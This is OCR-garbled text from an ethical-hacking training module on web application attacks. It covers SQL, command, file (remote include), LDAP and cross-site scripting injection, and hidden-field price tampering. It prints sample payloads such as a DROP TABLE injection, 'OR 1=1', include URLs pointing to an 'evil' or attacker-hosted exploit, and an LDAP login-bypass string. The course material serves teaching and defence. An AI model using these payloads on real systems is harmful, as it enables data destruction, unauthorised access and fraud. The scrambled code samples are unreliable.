delete, and update any data, i.e., re le va n t or irre le va n t to th a t p a rticula r a p p licatio n. They are m any types o f in je ctio n flaw s; som e o f th e m are as fo llo w s: S Q L i n j e c t i o n SQL in je ctio n is th e m ost com m on w e b site v u ln e ra b ility on th e In te rn e t. It is th e te chniq u e used to take advantage o f n on-validated in p u t vu ln e ra b ilitie s to pass SQL com m ands th ro u g h a w eb a p p licatio n fo r execution by a backend database. In this, th e a tta cke r injects the m alicious SQL queries in to th e user in p u t fo rm and th is is usually p e rfo rm e d to e ith e r to gain u n auth orized access to a database or to re trie ve in fo rm a tio n d ire c tly fro m th e database. * C o m m a n d i n j e c t i o n The flaw s in com m and in je ctio n are a n o th e r typ e o f w eb applica tio n v u ln e ra b ility. Module 13 Page 1765 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

44 Ethical Hacking and Countermeasures Hacking Web Applications These flaw s are highly dangerous. In th is typ e o f attack, th e a tta cke r injects th e m alicious code via a w eb applicatio n. L A D P i n j e c t i o n LDAP in je ctio n is an a tta ck m e th o d in w hich th e w e b site th a t constructs th e LDAP sta te m e n ts fro m user-supplied in p u t are explo ite d fo r launching attacks. W hen an a pplicatio n fails to sanitize th e user in p u t, th e n th e LDAP sta te m e n t can be m o d ifie d w ith th e help o f local proxy. This in tu rn results in th e execution o f a rb itra ry com m ands such as g ra n tin g access to u n auth orized queries and a lte rin g th e conte n t inside th e LDAP tree. Module 13 Page 1766 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

45 Ethical Hacking and Countermeasures Hacking Web Applications S Q L I n j e c t i o n A t t a c k s C E H SQL injection attacks J J SQL injection attacks use a series o f m alicious SQL q u e rie s to dire ctly m anipulate th e database J An attacker can use a vuln e ra ble w e b application to bypass norm a l s e c u rity m easures and obta in d ire ct access to th e valuable data SQL injection attacks can o fte n be executed fro m th e address bar, fro m w ithin application fields, and through queries and searches 01 <? p h p W eb B ro w se r נ... t e s t ') ; D R O P TA BLE M e s s a g e s ; - - In te rn e t W hen this code is sent to th e database server, it drops the Messages table 02 f u n c t i o n s a v e e m a i l ( $ u s e r, $ m e s s a g e ) 03 { 04 $ s q l = "IN S E R T IN T O M e s s a g e s ( 05 u s e r, m e s s a g e 06 ) VALUES ( 07 ' $ u s e r 1, ' $ m e s s a g e ' 08 ) 09 r e t u r n m y s q l _ q u e r y ( $ s q l ) ; 10 } 11? > Code to insert spammy data on behalf of other users SC*L Injection vulnerable server code A tta cker t e s t ' ), ( ' u s e r 2 ', '1 am J a s o n ' ), ( ' u s e r 3 ', 'Y o u a r e h a c k e d Note: For com plete coverage o f SQL Injection concepts and techniques, refer to M odule 14: SQL Injection C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. S Q L I n j e c t i o n A t t a c k s SQL in je ctio n attacks use com m and sequences fro m S tru ctu re d Q u e ry Language (SQL) sta te m e n ts to c o n tro l database data d ire ctly. A pplications o fte n use SQL sta te m e n ts to a u th e n tica te users to th e a p p licatio n, va lid a te roles and access levels, store and o b ta in in fo rm a tio n fo r th e a p p licatio n and user, and link to o th e r data sources. Using SQL in je ctio n m ethods, an a tta cke r can use a vu ln e ra b le w eb applica tio n to avoid norm al security m easures and o b ta in d ire ct access to valuable data. The reason w h y SQL in je ctio n attacks w o rk is th a t th e applica tio n does n o t p ro p e rly validate in p u t before passing it to a SQL s ta te m e n t. For exam ple, th e fo llo w in g SQL sta te m e n t, s e l e c t * from ta b le n a m e where User1D= 2302 becom es th e fo llo w in g w ith a sim ple SQL in je ctio n attack: SELECT * FROM ta b le n a m e WHERE U s e rid = 2302 OR 1=1 The expression "OR 1=1" evaluates to th e value "TRUE," o fte n a llo w in g th e e n u m e ra tio n o f all user ID values fro m th e database. SQL in je ctio n attacks can o fte n be ente re d fro m th e address bar, fro m w ith in applica tio n fields, and th ro u g h queries and searches. SQL in je ctio n attacks can a llo w an a tta cke r to : Log in to th e applica tio n w ith o u t supplying valid credentials Module 13 Page 1767 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

46 Ethical Hacking and Countermeasures Hacking Web Applications P erform queries against data in th e database, o fte n even data to w hich th e a pplicatio n w o u ld n o t n o rm a lly have access M o d ify th e database contents, o r d rop th e database a lto g e th e r Use th e tru s t relationship s established b e tw e e n th e w eb a p p licatio n com ponents to access o th e r databases m i W e b Internet B ro w s e r A t e s t ') ; D R O P T A B LE M e s s a g e s ; W hen th is code is sent to th e database server, it drops the Messages table 01 <? p h p 02 f u n c t i o n s a v e e m a i l (? u s e r,? m e s s a g e ) 03 < 04 $ s q l = " IN S E R T IN T O M e s s a g e s ( 05 u s e r, m e s s a g e 06 ) VA LU E S ( 07 '? u s e r ', '? m e s s a g e ' 08 ) " ; 09 r e t u r n m y s q l q u e r y ( $ s q l ) ; 10 } 11?> Code to insert spammy data on behalf of other users t e s t ' ), ( ' u s e r 2 ', '1 am J a s o n ' ), C u s e r 3 ' SQL Injection vulnerable server code 'Y o u a r e h a c k e d FIGURE : SQ L In je c tio n A tta c k s Module 13 Page 1768 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

47 Ethical Hacking and Countermeasures Hacking Web Applications - C o m m a n d I n j e c t i o n A t t a c k s C E H J A n a tta c k e r trie s t o c r a ft an in p u t s trin g t o g a in sh e ll access t o a w e b s e rv e r J S hell In je c tio n fu n c tio n s in c lu d e s y s t e m ( ), s t a r t P r o c e s s ( ), j a v a. l a n g. R u n tim e. e x e c ( ), S y s t e m. D i a g n o s t ic s. P r o c e s s. S t a r t ( ), a n d s im ila r APIs T h is ty p e o f a tta c k is used t o d e fa c e w e b s ite s v ir tu a lly. U sin g th is a tta c k, an a tta c k e r a d d s an e x tra H T M L -b a s e d c o n te n t t o th e v u ln e ra b le w e b a p p lic a tio n In H T M L e m b e d d in g a tta c k s, u s e r in p u t to a w e b s c rip t is p la c e d in to th e o u t p u t H T M L, w it h o u t b e in g ch e cke d fo r H T M L c o d e o r s c rip tin g J J T h e a tta c k e r e x p lo its th is v u ln e ra b ility a n d in je c ts m a lic io u s c o d e in to s y s te m file s J h t t p : / /w w w. j u g g y b o y. c o m / v u l n e r a b l e. p h p? C O L O R = h ttp : / / e v i l / e x p l o i t? C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. C o m m a n d I n j e c t i o n A t t a c k s C om m and in je ctio n flaw s a llo w attackers to pass m a licio u s code to d iffe re n t system s via a w eb applica tio n. The attacks include calls to th e o p e ra tin g system over system calls, use o f external program s over shell com m ands, and calls to th e backend databases over SQL. Scripts th a t are w ritte n in Perl, Python, and o th e r languages execute and in se rt th e p o o rly designed w eb applications. If a w eb applicatio n uses any typ e o f in te rp re te r, attacks are inserted to in flic t dam age. To p e rfo rm fu n ctio n s, w eb applicatio ns m ust use o p e ra tin g system fe a tu re s and external program s. A lth o u g h m any program s invoke e xternally, th e fre q u e n tly used program is Sendm ail. W hen a piece o f in fo rm a tio n is passed th ro u g h th e HTTP external request, it m ust be care fu lly scrubbed, o r th e a tta cke r can in se rt special characters, m alicious com m ands, and com m and m o d ifie rs in to th e in fo rm a tio n. The w eb applica tio n th e n b lin d ly passes these characters to th e external system fo r execution. Inserting SQL is dangerous and ra th e r w idespread, as it is in th e fo rm o f com m and in je ctio n. C om m and in je ctio n attacks are easy to carry o u t and discover, b u t th e y are to u g h to understand. ^ = = 3 S h e l l I n j e c t i o n 1 To com p le te various fu n c tio n a litie s, w eb applicatio ns use various applicatio ns and program s. It is ju s t like sending an em ail by using th e UNIXsendm ail program. There is a chance th a t an a tta cke r m ay in je ct code in to these program s. This kind o f attack is dangerous Module 13 Page 1769 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

48 Ethical Hacking and Countermeasures Hacking Web Applications especially to w eb page security. These injections a llo w in tru d e rs to p e rfo rm various types o f m alicious attacks against th e user's server. An a tta cke r trie s to cra ft an in p u t strin g to gain shell access to a w eb server. Shell in je ctio n fu n ctio n s include system (), S tart Process (), java.lang.r untim e.exec (), System.D iagnostics.process.start (), and sim ila r APIs. H T M L E m b e d d i n g This typ e o f a tta ck is used to deface w ebsites v irtu a lly. Using th is attack, an atta cke r adds extra HTML-based c o n te n t to th e vu ln e ra b le w eb applica tio n. In HTML em beddin g attacks, user in p u t to a w eb scrip t is placed in to th e o u tp u t HTML, w ith o u t being checked fo r HTML code o r scripting. F i l e I n j e c t i o n a The atta cke r exploits th is v u ln e ra b ility and injects m alicious code in to system files: h ttp ://w w w.iu g g v b o v.c o m /v u ln e ra b le.p h p? C O L O R = h ttp ://e v il/e x p lo it Users are allow ed to upload various files on th e server th ro u g h various applicatio ns and those files can be accessed th ro u g h th e In te rn e t fro m any p a rt o f th e w o rld. If th e applica tio n ends w ith a php extensionand if any user requests it, th e n th e a p p lica tio n in te rp re ts it as a php script and executes it. This allow s an a tta cke r to p e rfo rm a rb itra ry com m ands. Module 13 Page 1770 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

49 Ethical Hacking and Countermeasures Hacking Web Applications C o m m a n d I n j e c t i o n E x a m p l e A tta cker Launching Code Injection Attack bin/lspro/lspro.cgi?hit_out=1036 M alicious code: w w w. ju g g y b o y. c a m / b a i m e r. g i f l n e w p a s s w o r d S An attacker enters m a licious code (account num ber) w ith a new password 6 The last tw o sets o f num bers are th e banner size ^ J u g g y B o y c o m User Name Address C Addison addi@ juggyboy.co~ Site URL ^ Banner URL [ gif newpassword Password [ newpassword נ כ «Once th e attacker clicks th e su b m it b u tto n, th e passw ord fo r th e account 1036 is changed to "new passw ord " 9 The server script assumes th a t o nly th e URL o f the banner image file is inserted into th a t field Poor input validation at server script was exploited in this attack th a t uses database INSERT and UPDATE record command C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. C o m m a n d I n j e c t i o n E x a m p l e The fo llo w in g is an exam ple o f com m and in je ctio n : To p e rfo rm a com m and in je ctio n attack, th e atta cker firs t enters m alicious code (account n u m ber) w ith a new passw ord. The last tw o sets o f num bers are th e banner size. Once th e a tta cke r clicks th e su b m it b u tto n, th e passw ord fo r th e account 1036 is changed to "n e w p a ssw o rd." The server scrip t assumes th a t only th e URL o f th e banner im age file is inserted in to th a t field. Module 13 Page 1771 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

50 Ethical Hacking and Countermeasures Hacking Web Applications A tta c k e r Launching Code Injection A ttack Malicious code: M [... > w w w.^ u g g y b o y.c o m /b a n n e r.g ifl n e w p a s s w o rd l I \ f http //juggytx>y/cgi bin/lspr0/lspf0cgi?ht1 out 1036.com U M f N«m«Addison A ddreu ^ addigojuggytooycom Sit U R I [ wwwiuggyboycom כ כ 1nn#f URL [.g if) new pjssw ord 1036 fc0 468 ] Password [ ncwpjsswofd ]! P o o r in p u t v a lid a tio n a t se rv e r s c rip t w a s e x p lo ite d in th is a tta c k th a t u se s d a ta b a s e INSERT a n d U P D A T E re co rd c o m m a n d FIGURE : C o m m a n d In je c tio n E x a m p le Module 13 Page 1772 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

51 Ethical Hacking and Countermeasures Hacking Web Applications F i l e I n j e c t i o n A t t a c k C E H G O <form m eth o d = " g et"> < s e l e c t name="drink"> < o p tio n v a lu e = " p e p s i" > p e p s i< /o p tio n > < o p tio n v a lu e = " c o k e יי > cok e< / o p t i on> < / s e l e c t > C in p u t ty p e ="su b m it"> < /form > <?p h p $ d r i n k = ' c o k e ' ; i f ( i s s e t ( $ _ G E T [ 'DRINK'] ) $ $dd r iin n k = $ _ G E T [ 'DRINK'] ; r e q u i r e ( J$ d r i n k. '.p h p ) ;?> : ך... C lient code running in a brow ser h t t p : / / w w w.j u g g y b o y.c o m / o r d e r s.p h p? D R I N K = h t t p : / / j a s o n e v a l. c o m / e x p l o i t? < e A ttacker injects a File injection attacks enable attackers to e x p lo it re m otely hosted file at v u ln e ra b le scripts on th e server to use a re m ote file w w w.ja soneval.com instead o f a presum ably tru ste d file fro m th e local containing an exploit file system A tta cke r C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. F i l e I n j e c t i o n A t t a c k Users are allow ed to upload vario u s file s on th e server th ro u g h various applications and those files can be accessed th ro u g h th e In te rn e t fro m anyw here in th e w o rld. If th e applica tio n ends w ith a php extension and if any user requests it, th e n th e a pplicatio n in te rp re ts it as a php script and executes it. This allow s an a tta cke r to p e rfo rm a rb itra ry com m ands. File in je ctio n attacks enable attackers to e xp lo it vu ln e ra b le scripts on th e server to use a re m o te file instead o f a presum ably tru s te d file fro m th e local file system. C onsider th e fo llo w in g clie n t code running in a brow ser: < fo rm m e th o d = "g e t"> < s e le c t nam e="drink"> C o p tio n v a lu e = " p e p s i" > p e p s i< /o p tio n > C o p tio n v a lu e = " c o k e "> c o k e < /o p tio n > < / s e le c t > < in p u t ty p e = " s u b m it"> < / forra> V u ln e ra b le PHP code <?php $ d r in k = 'c o k e '; Module 13 Page 1773 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

52 Ethical Hacking and Countermeasures Hacking Web Applications i f ( is s e t ( $ _ G E T ['D R IN K '] ) ) $ d r in k = $_GET[ 'D R IN K ' ] ; r e q u ir e ( $ d r in k. '.p h p ' ) ;?> To e x p lo it th e vu ln e ra b le php code, th e a tta cke r injects a re m o te ly hosted file at w w w.jasoneva l.com co n ta in in g an exploit. E xplo it code h ttp ://w w w. iuggvboy.com/orders. php?drink= /exploit? Module 13 Page 1774 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

53 Ethical Hacking and Countermeasures Hacking Web Applications W h a t I s L D A P I n j e c t i o n? C E H I ( rtifwtf itfciul UtlM A n LDAP in je c tio n te c h n iq u e is u sed t o ta k e a d v a n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e ra b ilitie s t o pass LD AP filte r s u sed fo r s e a rc h in g D ire c to ry S e rvice s t o o b ta in d ir e c t access to d a ta b a s e s b e h in d an LD AP tr e e (* a. WJ Q J V) ph (0 A * LDAP D irectory Services store and organize in fo rm a tio n based on its a ttrib u te s. The inform ation is hierarchically organized as a tre e o f directo ry entries LDAP is based on th e d ient-se rve r m odel and clients can search th e d ire c to ry e n trie s using filte rs Filter ( a t t r ib u t e N a m e o p e r a t o r v a l u e ) Syntax O pera to r Example = (a b je c tc la s s = u s e r) > = (m dbstorageq uota>=l00000) < = (m dbstorageq uota<=l00000) ~ = (d i sp1ayname ~=Foecke1e r ) * (displayn am e * J o h n *) AND (&) (& ( o b je c tc la s s - u s e r ) (displayn a m e John) OR ( ) ( ( o b je c tc la s s = u s e r ) (displaynam e=john) N O T(!) ( fo b je c tc la s s = g ro u p ) C o pyright by E&Coinal.A ll R ights Reserved. Reproduction is S trictly Prohibited. W h a t i s L D A P I n j e c t i o n? An LDAP (L ig h tw e ig h t D ire cto ry Access P rotocol) in je ctio n attack w orks in th e same w ay as a SQL in je ctio n attack. All th e in p u ts to th e LDAP m ust be p ro p e rly filte re d, o th e rw ise vu ln e ra b ilitie s in LDAP a llo w executing unauth o rize d queries o r m o d ific a tio n o f th e contents. LDAP attacks e x p lo it w eb-based applicatio ns co n stru cte d based on LDAP sta te m e n ts by using a local proxy. LDAP sta te m e n ts are m o d ifie d w hen certain applicatio ns fail. These services store and organize in fo rm a tio n based on its a ttrib u te s. The in fo rm a tio n is hierarchically organized as a tre e o f d ire c to ry entries. It is based on th e clie n t-se rve r m odel and clients can search the d ire c to ry e ntries using filte rs. Module 13 Page 1775 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

54 Ethical Hacking and Countermeasures Hacking Web Applications F ilte r Syntax O p e ra to r ( a t t r i b u t e N a m e o p e r a t o r v a l u e ) Example ( d i sp layn am e~= F oec k e l e r ) (d i sp layn am e= *J o h n * ) AND (& ) (S ( o b je c t c la s s = u s e r ) ( d is p la y N a m e = J o h n ) OR ( ) (& (ob j e c t d s s s = u s e r ) (d ± sp layn am e= John ) NOT (I) (! o b je c tc la s s = g r o u p ) FIGURE : LDAP In je c tio n Module 13 Page 1776 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

55 Ethical Hacking and Countermeasures Hacking Web Applications H o w L D A P I n j e c t i o n W o r k s C E H Normal Query n Norm al Q u ery + Code Injection C lient Normal Result LDAP LDAP Server Client Norm al Result and/or Additional Information LDAP LDAP Server LDAP injection attacks are sim ilar to SQL injection attacks but e xp lo it user param eters to generate LDAP query To te st if an application is vuln e ra ble to LDAP code inje ctio n, send a q u e ry to th e server m eaning th a t generates an invalid input. Ifth e LDAP server returns an e rro r, it can be exploited w ith code injection techniques A ccount Login )) oy)(& v! U sernam e jug g yb 1 1 V v.\ : Password blah A tta cke r S u b m it If an attacker enters valid user name "juggyboy", and injects juggyboy)(&)) then the URL string becomes (&(USER=juggyboy)(&))(PASS=blah)) only the first filte r is processed by the LDAP server, only the query (&(USER=juggyboy)(&)) is processed. This query is always true, and the attacker logs into the system without a valid password Copyright by E&Coinal.All Rights Reserved. Reproduction is Strictly Prohibited. H o w L D A P I n j e c t i o n W o r k s ( H U LDAP in je ctio n attacks are com m o n ly used on w eb applications. LDAP is applied to any o f th e applicatio ns th a t have som e kind o f user inputs used to generate th e LDAP queries. To te s t if an applica tio n is v u ln e ra b le to LDAP code in je ctio n, send a query to th e server th a t generates an invalid in p u t. If th e LDAP server re tu rn s an e rro r, it can be explo ite d w ith code in je ctio n techniques. D epending upon th e im p le m e n ta tio n o f th e ta rg e t, one can try to achieve: Login Bypass In fo rm a tio n Disclosure e Privilege Escalation In fo rm a tio n A lte ra tio n Module 13 Page 1777 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

56 Ethical Hacking and Countermeasures Hacking Web Applications Normal operation י * N o rm al Q u e ry N o rm al R esult Client LDAP Server FIGURE : N o rm a l o p e r a tio n Operation with code injection N o rm al Q u e ry + Code Injection ץ < N o rm al R esult a n d /o r c LDAP Client A d d itio n al In fo rm a tio n LDAP Server FIGURE : O p e r a tio n w it h c o d e in je c tio n Attack If an a tta cke r enters a valid user nam e o f "ju g g y b o y " and injects ju g g y b o y ) (&)), th e n th e URL string becom es (& (u s e r= ju g g y b o y ) (&)) (P A S S = b la h )). O nly th e firs t filte r is processed by th e LDAP server; only th e query (& (USER= ju g g y b o y ) (&)) is processed. This query is always tru e, and th e a tta cke r logs in to th e system w ith o u t a valid passw ord. A c c o u n t Login U s e rn a m e jug g yb oy)(& )) A tta c k e r : P assword blah FIGURE : A tta c k Module 13 Page 1778 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

57 Ethical Hacking and Countermeasures Hacking Web Applications H i d d e n F i e l d M a n i p u l a t i o n A t t a c k I C E H HTML Code Norm al Request < fo m method="post" a ctio n ^ " p a g e.a sp x " > <in p u t type="hidden" name= <" " value "PRICE" Product name: < in p u t typ e= " t e x t name="product" v a lu e ="Juggyboy S h ir t "X b r> Product p r ic e : " X b r > <input type=" submit" valu e= " subm it" > </form > h t t p : / / w w w. j u g g y b o y. c o m /p a g e. a s p x? p r o d u c t= J u g g y b o y % 2 O S h i r t & p r i c e = A tta c k R equest h t t p : / /w w w. ju g g y b o y. c o m /p a g e. a s p x? p r o d u o t= J u g g y b o y % 2 0 S h i r t & p r i c e = P roduct Nam e P roduct Price J u g g y b o y S h irt ^ [ 200 ) Subm it $ W hen a user makes selections on an HTML page, th e selection is typically stored as fo rm field values and sent to the application as an HTTP re quest (GET o r POST) 0 HTML can also sto re field values as hidden fields, w hich are not re ndered to th e screen by the browser, but are collected and subm itted as parameters during form submissions 6 Attackers can exam ine th e HTML code o f th e page and change th e hidden field values in order to change post requests to server C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. H i d d e n F i e l d M a n i p u l a t i o n A t t a c k H idden m a n ip u la tio n attacks are m ostly used against e com m erce w ebsites today. M any onlin e stores face these problem s. In every clie n t session, developers use hidden fields to store clie n t in fo rm a tio n, including price o f th e p ro d u ct (Including discount rates). A t th e tim e o f d e velo p m e n t o f these such program s, developers feel th a t all th e applicatio ns developed by th e m are safe, b u t a hacker can m a n ip u la te th e prices o f th e p ro d u ct and co m p le te a tra n s a c tio n w ith price th a t he or she has altered, ra th e r th a n th e actual price o f th e p ro duct. For e xam ple: On ebay, a p a rticu la r m obile phone is fo r sale fo r $1000 and th e hacker, by a lte rin g th e price, gets it fo r only $10. This is a huge loss fo r w ebsite ow ners. To p ro te c t th e ir n e tw o rks fro m attacks, w e b site ow ners are using th e latest a n tiviru s so ftw a re, fire w a lls, in tru sio n d e te ctio n system s, etc. If th e ir w e b site is attacked, o fte n it also loses its c re d ib ility in th e m arket. W hen any ta rg e t requests w eb services and makes choices on th e HTM L page, th e n th e choices are saved as fo rm fie ld values and delivered to th e requested applica tio n as an HTTP request (GET or POST). The HTML pages generally save fie ld values as hidden fields and th e y are not displayed on th e m o n ito r o f th e ta rg e t b u t saved and placed in th e fo rm o f strings or param eters at th e tim e o f fo rm subm ission. A ttackers can exam ine th e HTML code o f th e page and change th e hidden fie ld values in o rd e r to change post requests to th e server. > 00 " = e h id d e n " name= "PRIC E" v a lu = e < in p u t ty p Module 13 Page 1779 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

58 Ethical Hacking and Countermeasures Hacking Web Applications P ro d u c t name: < in p u t ty p e = " t e x t " n a m e = "p ro d u c t" v a lu e = "J u g g y b o y S h i r t " x b r > P ro d u c t p r ic e : "> < b r> < in p u t ty p e = " s u b m it" v a lu e = 1's u b m it"> < /fo rm > 1. Open th e h tm l page w ith in an HTML e d ito r. 2. Locate th e hidden fie ld (e.g., "< type=hid d e n nam e=price value=200.00>"). 3. M o d ify its c o n te n t to a d iffe re n t value (e.g. "< type=hid d e n nam e=price value=2.00>"). 4. Save th e h tm l file locally and brow se it. 5. Click th e Buy b u tto n to p e rfo rm e le ctro n ic shopliftin g via hidden m a n ip u la tio n. HTM L Code N o rm a l R e q u e s t <form m ethod="post" i. nt «; n n s "p a g «. a«spx"> < in p u t ty p e= " 11id d en " name= "PRICE" v a lu e = " " > P r o d u c t n am e: < in p u t ty p e= " te x t" n am e="product" v a lu e = " J u g g y b o y S h ir t " X b r > P r o d u c t p r ic e : " > < b r> < in p u t ty p e= " su b m it" v a lu e = "subn'.it,,> < : r /f o < h t t p : / /w w w. ju g g y b o y. c o m / p a g e. a s p x? p r o d u c t = J u g g y b o y %2OS h i r t f i p r i c e = ! " H id d e n F ie ld P rice = A tta c k R e q u e s t h t t p : / / w w w. ju g g y b o y. c o m / p a g e. a s p x? p r o d u c t= J u g g y b o y % 2 0 S h i r t & p r i c e = FIG U R E : H id d e n F ie ld M a n ip u la tio n A tt a c k Module 13 Page 1780 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

59 Ethical Hacking and Countermeasures Hacking Web Applications C ro ss-site s c rip tin g (,XSS' or'c S S ') a tta c k s e x p lo it v u ln e ra b ilitie s in d y n a m ic a lly g e n e ra te d w e b pages, w h ic h e n a b le s m a lic io u s a tta cke rs to in je c t c lie n t-s id e s c rip t in to w e b pages v ie w e d b y o th e r users It o ccurs w h e n in v a lid a te d in p u t d a ta is in c lu d e d in d y n a m ic c o n te n t th a t is s e n t to a u ser's w e b b ro w s e r f o r re n d e rin g A tta c k e rs in je c t m a lic io u s Ja vas crip t, V B S cript, A ctive X, HTM L, o r Flash fo r e x e c u tio n o n a v ic tim 's syste m by h id in g it w ith in le g itim a te re q u e s ts ם ^ Malicious script execution Session hijacking ^ Redirecting to a malicious server Brute force password cracking privilegesuserexploitingi I Data th eft ^ ^ ^ Ads in hidden!frames and pop-ups Intranet probing '1 m anipulation Data Keylogging ^ and rem ote monitoring C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited C r o s s - S i t e S c r i p t i n g ( X S S ) A t t a c k s Cross-site scripting is also called XSS. V u ln e ra b ilitie s occur w hen an a tta cke r uses w eb applicatio ns and sends m alicious code in JavaScript to d iffe re n t end users. It occurs w hen invalidate d in p u t data is included in d yn a m ic c o n te n t th a t is sent to a user's w eb b ro w ser fo r rendering. W hen a w eb a p p licatio n uses in p u t fro m a user, an atta cke r can com m ence an attack using th a t in p u t, w hich can propagate to o th e r users as w ell. A ttackers in je ct m alicious JavaScript, VBScript, ActiveX, HTML, or Flash fo r execution on a victim 's system by hiding it w ith in le g itim a te requests. The end user m ay tru s t th e w eb applica tio n, and th e a tta cke r can e x p lo it th a t tru s t in o rd e r to do things th a t w o u ld n o t be allow ed under norm al conditions. An a tta cke r o fte n uses d iffe re n t m ethods to encode th e m a licio u s p o rtio n (U nicode) o f th e tag, so th a t a request seems genuine to th e user. Some o f th e m are: M alicious scrip t execution - Session hijacking B rute fo rce password cracking - R edirecting to a m alicious server Q Q E xploiting user privileges - Data th e ft In tra n e t probing - Ads in hidden!frames and pop-ups Data m a n ip u la tio n - Keylogging and re m o te m o n ito rin g Module 13 Page 1781 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

60 Ethical Hacking and Countermeasures Hacking Web Applications H o w X S S A t t a c k s W o r k C E H N o r m a l R e q u e s t T h is e x a m p le u se s a ra ble page w h ic h h a n d le s f o r a n o n e x is te n t pages, a classic 404 error page (H a n d le s r e q u e s ts f o r a n o n e x is te n t p a g e, a cla s s ic e r r o r p a g e ) S e rv e r h t t p : / / ju g g y b o y.c o m /< s c r ip t> a le r t( "WARNING: The a p p lic a tio n has e n c o u n te re d an e r r o r ) ; < / s o r ip t > C o pyright by E&Coinal.A ll R ights Reserved. Reproduction is S trictly Prohibited. S H o w X S S A t t a c k s W o r k To understand how cross-site scripting is typically e xplo ite d, consider th e fo llo w in g h yp o th e tica l exam ple. Normal Request h t t p : / / ju g g y b o y.c o m כ/ a s o n _ f i l «. h t m l 404 Not found / j a s o n _ f i l e. h t m l XSS Attack Code Server Response Server Response Server Code < h f c m l > <body> <? php p r i n t "Not fo u n d : " u r ld e a o d e ($_SERVER[" REQUEST_URI"] ) ;?> < /b o d y > < /h tm l> (H andles requests fo r a n o n e xisten t page, a clastic 40A error page) n Server h ttp ://ju g g y b o y.c o a a /< 3 c rip t> a le rt( " W A R N IN G : The a p p l i c a t i o n h a s n c o u n t«r * d a n rx ro r" ) ; < / s c r i p t > FIGURE 13.15: How XSS Attacks Work Module 13 Page 1782 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

61 Ethical Hacking and Countermeasures Hacking Web Applications C r o s s - S i t e S c r i p t i n g A t t a c k S c e n a r i o : A t t a c k v i a E m a i l C E H S e n d s e m a il w ith m a lic io u s lin k Hi, Y o u h ave w o n a lo tt e ry o f $ 2 M, d ick the lin k to claim it. <A H R E F = h ttp ;//ju g g yboy. c o m /... User clicks the malicious link M a lic io u s c o d e is e x e c u t e d o n t h e c lie n t w e b b r o w s e r Name: Shaun Age: 31 Location: UK ^ Occupation: SE Last vish: Sept 21,2010 S e r v e r s e n d s a p a g e t o t h e u s e r w ith c lie n t p r o f ile <... A ttacker In this example, the attacker crafts an message w ith a malicious script and sends it to the victim : < A H R E F = h t t p : / / l e g i t i m a t e S i t e. c o m / r e g i s t r a t i o n. c g i? c l i e n t p r o f i l e = < S C R I P T > m a l i c i o u s c o d e c / S C R I P T» C l i c k h e r e < / A > W hen the user clicks on the link, the URL is sent to legitim ates ite.com w ith the malicious code The legitim ate server sends a page back to th e user including th e value o f c l i e n t p r o f i l e, and th e m alicious code is executed on the client machine C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited C r o s s - S i t e S c r i p t i n g A t t a c k S c e n a r i o : A t t a c k v i a E m a i l In a crosssite scripting attack via em ail, th e a tta cke r crafts an em ail th a t contains a link to m alicious script and sends it to th e victim. M a lic io u s Script: <A HREF=h t t p : / / l e g i t i m a t e S i t e. c o m / r e g is t r a t io n. c g i? c lie n tp r o file = < S C R IP T > m a lic io u s c o d e < /S C R IP T» C lic k h e re < /A > W hen th e user clicks on th e link, th e URL is sent to legitim ates ite.com w ith th e m alicious code. Then th e server sends a page back to th e user including th e value o f clie n t p ro file and the m alicious code is executed on th e clie n t's m achine. The fo llo w in g diagram depicts th e cross-site scripting atta ck scenario attack via em ail: Module 13 Page 1783 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

62 Ethical Hacking and Countermeasures Hacking Web Applications Sends em ail with malicious link R e q u e st Is re c e iv e d by le g itim a te se rv e r FIGURE : A tta c k v ia E m a il Module 13 Page 1784 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

